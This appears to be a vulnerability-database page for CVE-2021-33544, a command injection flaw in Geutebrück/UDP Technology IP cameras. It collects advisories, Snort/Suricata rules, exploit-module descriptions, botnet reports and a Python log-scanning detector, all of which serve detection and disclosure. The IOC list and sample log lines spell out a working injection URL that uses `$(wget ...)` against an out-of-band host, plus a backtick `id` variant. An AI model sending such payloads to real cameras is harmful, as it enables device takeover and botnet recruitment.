CVE-2021-33544
Published: 2021-09-13
Priority: P1 · 81 · high · CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW · EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 94.62% (99.8th percentile)
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.
Affected
66 ranges · showing 25

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | EBC-21xx – 1.12.0.27 | — |
| geutebr_ck | e2_series | EFD-22xx – 1.12.0.27 | — |
| geutebr_ck | e2_series | ETHC-22xx – 1.12.0.27 | — |
| geutebr_ck | e2_series | EWPC-22xx – 1.12.0.27 | — |
| geutebr_ck | encoder_g-code | — | — |
| geutebr_ck | encoder_g-code | EEC-2xx – 1.12.0.27 | — |
| geutebr_ck | encoder_g-code | EEN-20xx – 1.12.0.27 | — |
| geutebrueck | g-cam_ebc-2110_firmware | <= 1.12.0.27 | — |
| geutebrueck | g-cam_ebc-2110_firmware | — | — |
| geutebrueck | g-cam_ebc-2111_firmware | <= 1.12.0.27 | — |
| geutebrueck | g-cam_ebc-2111_firmware | — | — |
| geutebrueck | g-cam_ebc-2112_firmware | <= 1.12.0.27 | — |
Detection & IOCs (extracted from sources)

- url: /uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
- path: /uapi-cgi/certmngr.cgi
- path: /testcmd.cgi
- path: /simple_reclistjs.cgi
- path: /factory.cgi
Snort rules:

```snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033295; rev:2;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033305; rev:1;)
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033304; rev:1;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033303; rev:1;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033297; rev:1;)
```
- Exploit targets the `state` parameter of certmngr.cgi with a shell command substitution payload (e.g., `$(...)`). Look for `&state=$` (URL-encoded as `&state=%24`) in HTTP GET requests to /certmngr.cgi.
- Exploit targets the `command` parameter of testcmd.cgi with a shell command substitution payload. Look for `command=$` (URL-encoded as `command=%24`) in HTTP GET requests to /testcmd.cgi, both inbound and outbound.
- Exploit targets the `date` parameter of simple_reclistjs.cgi with a shell command substitution payload. Look for `date=$` in HTTP GET requests to /simple_reclistjs.cgi.
- Exploit targets the `preserve` parameter of factory.cgi with a shell command substitution payload. Look for `preserve=$` in HTTP GET requests to /factory.cgi.
- The Nuclei PoC uses an out-of-band (OAST/interactsh) HTTP callback via a `wget` command injected into the `state` parameter to confirm exploitation. Monitor for unexpected outbound HTTP connections from camera devices.
- All exploit attempts use the HTTP GET method against the vulnerable CGI endpoints. Unauthenticated access is possible: no authentication headers are required in the PoC request.
- The Nuclei template uses `interactsh-url` as a placeholder for an out-of-band interaction server. The detection matcher only confirms exploitation via an HTTP callback (`interactsh_protocol: http`), meaning blind/non-OAST environments will not trigger the matcher.
- The ET Snort rules use `|24|` as the hex representation of the `$` character to detect shell command injection. Attackers using alternative injection syntaxes (e.g., backticks) may evade these signatures.
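Added example (not from the advisory, the ET rule set, or any vendor): a small Python access-log checker that applies the same per-endpoint parameter checks as the Snort/Suricata rules on this page, after URL-decoding, and also flags backticks and command separators, the evasion noted in the caveat above. The endpoint/parameter pairs are taken from the rules quoted on this page; the log format and the log lines are constructed for the example.

```python
"""Access-log check for CVE-2021-33544 exploitation attempts (added example).

Mirrors the ET Snort/Suricata rules: a GET to one of the UDP Technology CGI
endpoints whose injectable parameter carries shell syntax. The rules match only
a literal `$` (|24|) in the raw URI; this check percent-decodes the query first
and also flags backticks and command separators. Log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# endpoint basename -> injectable query parameter (from the ET rule set)
INJECTABLE_PARAMS = {
    "/certmngr.cgi": "state",
    "/testcmd.cgi": "command",
    "/simple_reclistjs.cgi": "date",
    "/factory.cgi": "preserve",
    "/tmpapp.cgi": "appfile.filename",
    "/oem.cgi": "environment.lang",
    "/language.cgi": "date",
}

# `$` mirrors the |24| byte in the ET rules; backtick and the separators cover
# the alternative syntaxes those signatures do not see.
SHELL_META = re.compile(r"[$`;|&\n]")

# Common/combined log format (assumed); only src, ts, method, target, status used.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(method, target):
    """Return (endpoint, parameter, decoded value) when the request looks like
    an exploitation attempt against a listed endpoint, otherwise None."""
    if method.upper() != "GET":          # every ET rule keys on GET
        return None
    parts = urlsplit(target)
    for endpoint, param in INJECTABLE_PARAMS.items():
        # match on the basename so /uapi-cgi/certmngr.cgi and /certmngr.cgi both hit
        if parts.path.endswith(endpoint):
            break
    else:
        return None
    # parse_qs percent-decodes values, so %24 and a raw $ are treated alike;
    # this is broader than the certmngr rule, which also requires action=createselfcert
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if SHELL_META.search(value):
            return endpoint, param, value
    return None


def scan_log(lines):
    """Run classify_request over access-log lines; return one dict per hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m["method"], m["target"])
        if hit is None:
            continue
        endpoint, param, value = hit
        findings.append({
            "src": m["src"], "ts": m["ts"], "endpoint": endpoint,
            "param": param, "payload": value, "status": int(m["status"]),
        })
    return findings


# Constructed sample lines: the page's PoC request, a backtick variant the |24|
# signatures miss, a benign certmngr request, and a non-GET request.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Sep/2023:10:01:02 +0000] "GET /uapi-cgi/certmngr.cgi'
    '?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://oast.example)'
    '&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything'
    ' HTTP/1.1" 200 512',
    '203.0.113.7 - - [06/Sep/2023:10:01:05 +0000] "GET /uapi-cgi/testcmd.cgi?command=%60id%60 HTTP/1.1" 200 128',
    '198.51.100.2 - - [06/Sep/2023:10:02:00 +0000] "GET /uapi-cgi/certmngr.cgi?action=createselfcert&state=Bavaria&country=DE HTTP/1.1" 200 400',
    '198.51.100.9 - - [06/Sep/2023:10:03:00 +0000] "POST /uapi-cgi/factory.cgi HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['endpoint']} {f['param']}={f['payload']!r} status={f['status']}")
```

A 200 response to a flagged request does not by itself prove the injected command ran; pair the hit with the outbound-connection check described in the bullet above.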
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vulncheck | — | 7.2 | HIGH | — |
GHSA
GHSA-6866-wg5c-v3mm
ghsa_unreviewed · 2022-05-24 · HIGH · CWE-77
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.
VulnCheck
geutebruck g-cam_ebc-2110: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2021 · CVSS 7.2 · HIGH
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.
Affected: geutebruck g-cam_ebc-2110
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://twitter.com/ESETresearch/status/1440052837820428298?s=20; https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx; https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits; https://dashboard.shadowse
CISA ICS
Geutebrück G-Cam E2 and G-Code
cisa_ics · 2021-07-27 · CVSS 9.8 · CRITICAL
ICS Advisory: Geutebrück G-Cam E2 and G-Code
Last Revised: July 27, 2021
Alert Code: ICSA-21-208-03
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
- Vendor: Geutebrück
- Equipment: G-Cam E2 and G-Code
- Vulnerabilities: Missing Authentication for Critical Function, Command Injection, Stack-based Buffer Overflow
## 2. RISK EVALUATION
UDP Technology supplies multiple OEMs such as Geutebrück with firmware for IP cameras. Successful exploitation of these vulnerabilities could allow unauthenticated access to sensitive i
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033304; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name L
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033303; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA000
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033295; rev:2; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA000
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033305; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Lat
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033297; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name La
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/tmpapp.cgi?"; fast_pattern; content:"appfile.filename=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033306; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/oem.cgi?"; fast_pattern; content:"environment.lang=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033300; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Late
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033302; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033294; rev:2; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033296; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/language.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033298; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name L
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/language.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033299; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Lat
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/oem.cgi?"; fast_pattern; content:"environment.lang=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033301; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Latera
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata · 2021-07-09 · CVSS 7.2 · HIGH
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/tmpapp.cgi?"; fast_pattern; content:"appfile.filename=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033307; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_na
Nuclei
Geutebruck - Remote Command Injection
nuclei · CVSS 7.2 · HIGH
Geutebruck is susceptible to multiple vulnerabilities in its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:

```yaml
id: CVE-2021-33544

info:
  name: Geutebruck - Remote Command Injection
  author: gy741
  severity: high
  description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.
  remediation:
```
Metasploit
Geutebruck Multiple Remote Command Execution
metasploit
This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.
Bleepingcomputer
Mirai DDoS malware variant expands targets with 13 router exploits
blogs_bleepingcomputer · 2023-10-10 · CVSS 9.8 · CRITICAL
By Bill Toulas
A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.
Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.
IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.
## Extensive IoT targeting
The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful
Fortinet
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
blogs_fortinet · 2023-10-09 · CVSS 9.8 · CRITICAL
By Cara Lin | October 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
In September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including D-Link devices, Netis wireless router, Sunhillo SureLine, Geutebruck IP camera, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.
Based on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on September 6, with trigger counts ran
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42 · 2021-10-14
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Authors: Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu. Published: October 14, 2021.
Greynoiseio
Malicious Tag Roundup (Jul 19-Aug 2, 2021)
blogs_greynoiseio · CVSS 10.0 · CRITICAL